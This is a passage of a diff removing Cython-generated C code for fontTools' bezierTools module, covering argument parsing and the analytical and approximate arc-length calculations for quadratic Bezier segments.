*__pyx_v_pt3) { - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticArcLength", 1); - - /* "fontTools/misc/bezierTools.py":183 - * 40.0 - * """ - * return calcQuadraticArcLengthC(complex(*pt1), complex(*pt2), complex(*pt3)) # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_calcQuadraticArcLengthC); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt1); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_4 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt2); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_5 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PySequence_Tuple(__pyx_v_pt3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __pyx_t_6 = __Pyx_PyObject_Call(((PyObject *)(&PyComplex_Type)), __pyx_t_3, NULL); if (unlikely(!__pyx_t_6)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_6); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = NULL; - __pyx_t_7 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_2))) { - __pyx_t_3 = PyMethod_GET_SELF(__pyx_t_2); - if (likely(__pyx_t_3)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); - __Pyx_INCREF(__pyx_t_3); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_2, function); - __pyx_t_7 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[4] = {__pyx_t_3, __pyx_t_4, __pyx_t_5, __pyx_t_6}; - __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_7, 3+__pyx_t_7); - __Pyx_XDECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - __Pyx_DECREF(__pyx_t_6); __pyx_t_6 = 0; - if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 183, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - } - __pyx_r = __pyx_t_1; - __pyx_t_1 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":151 - * - * - * def calcQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_XDECREF(__pyx_t_6); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLength", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC, "calcQuadraticArcLengthC(double complex pt1, double complex pt2, double complex pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a complex number.\n pt2: Handle point of the Bezier as a complex number.\n pt3: End point of the Bezier as a complex number.\n\n Returns:\n Arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC = {"calcQuadraticArcLengthC", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_11calcQuadraticArcLengthC(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - __pyx_t_double_complex __pyx_v_pt1; - __pyx_t_double_complex __pyx_v_pt2; - __pyx_t_double_complex __pyx_v_pt3; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("calcQuadraticArcLengthC (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, 1); __PYX_ERR(0, 186, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 186, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, 2); __PYX_ERR(0, 186, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "calcQuadraticArcLengthC") < 0)) __PYX_ERR(0, 186, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = __Pyx_PyComplex_As___pyx_t_double_complex(values[0]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - __pyx_v_pt2 = __Pyx_PyComplex_As___pyx_t_double_complex(values[1]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - __pyx_v_pt3 = __Pyx_PyComplex_As___pyx_t_double_complex(values[2]); if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 205, __pyx_L3_error) - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("calcQuadraticArcLengthC", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 186, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(__pyx_self, __pyx_v_pt1, __pyx_v_pt2, __pyx_v_pt3); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3) { - double __pyx_v_scale; - double __pyx_v_origDist; - double __pyx_v_a; - double __pyx_v_b; - double __pyx_v_x0; - double __pyx_v_x1; - double __pyx_v_Len; - __pyx_t_double_complex __pyx_v_d0; - __pyx_t_double_complex __pyx_v_d1; - __pyx_t_double_complex __pyx_v_d; - __pyx_t_double_complex __pyx_v_n; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - int __pyx_t_1; - PyObject *__pyx_t_2 = NULL; - double __pyx_t_3; - PyObject *__pyx_t_4 = NULL; - PyObject *__pyx_t_5 = NULL; - double __pyx_t_6; - double __pyx_t_7; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("calcQuadraticArcLengthC", 1); - - /* "fontTools/misc/bezierTools.py":218 - * # Analytical solution to the length of a quadratic bezier. - * # Documentation: https://github.com/fonttools/fonttools/issues/3055 - * d0 = pt2 - pt1 # <<<<<<<<<<<<<< - * d1 = pt3 - pt2 - * d = d1 - d0 - */ - __pyx_v_d0 = __Pyx_c_diff_double(__pyx_v_pt2, __pyx_v_pt1); - - /* "fontTools/misc/bezierTools.py":219 - * # Documentation: https://github.com/fonttools/fonttools/issues/3055 - * d0 = pt2 - pt1 - * d1 = pt3 - pt2 # <<<<<<<<<<<<<< - * d = d1 - d0 - * n = d * 1j - */ - __pyx_v_d1 = __Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt2); - - /* "fontTools/misc/bezierTools.py":220 - * d0 = pt2 - pt1 - * d1 = pt3 - pt2 - * d = d1 - d0 # <<<<<<<<<<<<<< - * n = d * 1j - * scale = abs(n) - */ - __pyx_v_d = __Pyx_c_diff_double(__pyx_v_d1, __pyx_v_d0); - - /* "fontTools/misc/bezierTools.py":221 - * d1 = pt3 - pt2 - * d = d1 - d0 - * n = d * 1j # <<<<<<<<<<<<<< - * scale = abs(n) - * if scale == 0.0: - */ - __pyx_v_n = __Pyx_c_prod_double(__pyx_v_d, __pyx_t_double_complex_from_parts(0, 1.0)); - - /* "fontTools/misc/bezierTools.py":222 - * d = d1 - d0 - * n = d * 1j - * scale = abs(n) # <<<<<<<<<<<<<< - * if scale == 0.0: - * return abs(pt3 - pt1) - */ - __pyx_v_scale = __Pyx_c_abs_double(__pyx_v_n); - - /* "fontTools/misc/bezierTools.py":223 - * n = d * 1j - * scale = abs(n) - * if scale == 0.0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - */ - __pyx_t_1 = (__pyx_v_scale == 0.0); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":224 - * scale = abs(n) - * if scale == 0.0: - * return abs(pt3 - pt1) # <<<<<<<<<<<<<< - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_2 = PyFloat_FromDouble(__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1))); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 224, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_r = __pyx_t_2; - __pyx_t_2 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":223 - * n = d * 1j - * scale = abs(n) - * if scale == 0.0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - */ - } - - /* "fontTools/misc/bezierTools.py":225 - * if scale == 0.0: - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) # <<<<<<<<<<<<<< - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_n, __pyx_v_d0); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 225, __pyx_L1_error) - __pyx_v_origDist = __pyx_t_3; - - /* "fontTools/misc/bezierTools.py":226 - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: # <<<<<<<<<<<<<< - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - */ - __pyx_t_2 = PyFloat_FromDouble(fabs(__pyx_v_origDist)); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GetModuleGlobalName(__pyx_t_4, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_4); - __pyx_t_5 = PyObject_RichCompare(__pyx_t_2, __pyx_t_4, Py_LT); __Pyx_XGOTREF(__pyx_t_5); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; - __pyx_t_1 = __Pyx_PyObject_IsTrue(__pyx_t_5); if (unlikely((__pyx_t_1 < 0))) __PYX_ERR(0, 226, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_5); __pyx_t_5 = 0; - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":227 - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d0, __pyx_v_d1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 227, __pyx_L1_error) - __pyx_t_1 = (__pyx_t_3 >= 0.0); - if (__pyx_t_1) { - - /* "fontTools/misc/bezierTools.py":228 - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) # <<<<<<<<<<<<<< - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_5 = PyFloat_FromDouble(__Pyx_c_abs_double(__Pyx_c_diff_double(__pyx_v_pt3, __pyx_v_pt1))); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 228, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":227 - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: - * if _dot(d0, d1) >= 0: # <<<<<<<<<<<<<< - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - */ - } - - /* "fontTools/misc/bezierTools.py":229 - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) # <<<<<<<<<<<<<< - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist - */ - __pyx_t_3 = __Pyx_c_abs_double(__pyx_v_d0); - __pyx_t_6 = __Pyx_c_abs_double(__pyx_v_d1); - __pyx_v_a = __pyx_t_3; - __pyx_v_b = __pyx_t_6; - - /* "fontTools/misc/bezierTools.py":230 - * return abs(pt3 - pt1) - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) # <<<<<<<<<<<<<< - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_6 = ((__pyx_v_a * __pyx_v_a) + (__pyx_v_b * __pyx_v_b)); - __pyx_t_3 = (__pyx_v_a + __pyx_v_b); - if (unlikely(__pyx_t_3 == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 230, __pyx_L1_error) - } - __pyx_t_5 = PyFloat_FromDouble((__pyx_t_6 / __pyx_t_3)); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 230, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":226 - * return abs(pt3 - pt1) - * origDist = _dot(n, d0) - * if abs(origDist) < epsilon: # <<<<<<<<<<<<<< - * if _dot(d0, d1) >= 0: - * return abs(pt3 - pt1) - */ - } - - /* "fontTools/misc/bezierTools.py":231 - * a, b = abs(d0), abs(d1) - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist # <<<<<<<<<<<<<< - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d, __pyx_v_d0); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 231, __pyx_L1_error) - if (unlikely(__pyx_v_origDist == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 231, __pyx_L1_error) - } - __pyx_v_x0 = (__pyx_t_3 / __pyx_v_origDist); - - /* "fontTools/misc/bezierTools.py":232 - * return (a * a + b * b) / (a + b) - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist # <<<<<<<<<<<<<< - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - * return Len - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__dot(__pyx_v_d, __pyx_v_d1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 232, __pyx_L1_error) - if (unlikely(__pyx_v_origDist == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 232, __pyx_L1_error) - } - __pyx_v_x1 = (__pyx_t_3 / __pyx_v_origDist); - - /* "fontTools/misc/bezierTools.py":233 - * x0 = _dot(d, d0) / origDist - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) # <<<<<<<<<<<<<< - * return Len - * - */ - __pyx_t_3 = __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(__pyx_v_x1); if (unlikely(__pyx_t_3 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 233, __pyx_L1_error) - __pyx_t_6 = __pyx_f_9fontTools_4misc_11bezierTools__intSecAtan(__pyx_v_x0); if (unlikely(__pyx_t_6 == ((double)-1) && PyErr_Occurred())) __PYX_ERR(0, 233, __pyx_L1_error) - __pyx_t_7 = ((2.0 * (__pyx_t_3 - __pyx_t_6)) * __pyx_v_origDist); - __pyx_t_6 = (__pyx_v_scale * (__pyx_v_x1 - __pyx_v_x0)); - if (unlikely(__pyx_t_6 == 0)) { - PyErr_SetString(PyExc_ZeroDivisionError, "float division"); - __PYX_ERR(0, 233, __pyx_L1_error) - } - __pyx_v_Len = fabs((__pyx_t_7 / __pyx_t_6)); - - /* "fontTools/misc/bezierTools.py":234 - * x1 = _dot(d, d1) / origDist - * Len = abs(2 * (_intSecAtan(x1) - _intSecAtan(x0)) * origDist / (scale * (x1 - x0))) - * return Len # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __pyx_t_5 = PyFloat_FromDouble(__pyx_v_Len); if (unlikely(!__pyx_t_5)) __PYX_ERR(0, 234, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_5); - __pyx_r = __pyx_t_5; - __pyx_t_5 = 0; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":186 - * - * - * @cython.returns(cython.double) # <<<<<<<<<<<<<< - * @cython.locals( - * pt1=cython.complex, - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_4); - __Pyx_XDECREF(__pyx_t_5); - __Pyx_AddTraceback("fontTools.misc.bezierTools.calcQuadraticArcLengthC", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":237 - * - * - * def approximateQuadraticArcLength(pt1, pt2, pt3): # <<<<<<<<<<<<<< - * """Calculates the arc length for a quadratic Bezier segment. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength, "approximateQuadraticArcLength(pt1, pt2, pt3)\nCalculates the arc length for a quadratic Bezier segment.\n\n Uses Gauss-Legendre quadrature for a branch-free approximation.\n See :func:`calcQuadraticArcLength` for a slower but more accurate result.\n\n Args:\n pt1: Start point of the Bezier as 2D tuple.\n pt2: Handle point of the Bezier as 2D tuple.\n pt3: End point of the Bezier as 2D tuple.\n\n Returns:\n Approximate arc length value.\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength = {"approximateQuadraticArcLength", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_13approximateQuadraticArcLength(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_pt1 = 0; - PyObject *__pyx_v_pt2 = 0; - PyObject *__pyx_v_pt3 = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[3] = {0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("approximateQuadraticArcLength (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_pt1,&__pyx_n_s_pt2,&__pyx_n_s_pt3,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt1)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt2)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, 1); __PYX_ERR(0, 237, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_pt3)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 237, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, 2); __PYX_ERR(0, 237, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "approximateQuadraticArcLength") < 0)) __PYX_ERR(0, 237, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 3)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - } - __pyx_v_pt1 = values[0]; - __pyx_v_pt2 = values[1]; - __pyx_v_pt3 = values[2]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("approximateQuadraticArcLength", 1, 3, 3, __pyx_nargs); __PYX_ERR(0, 237, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - 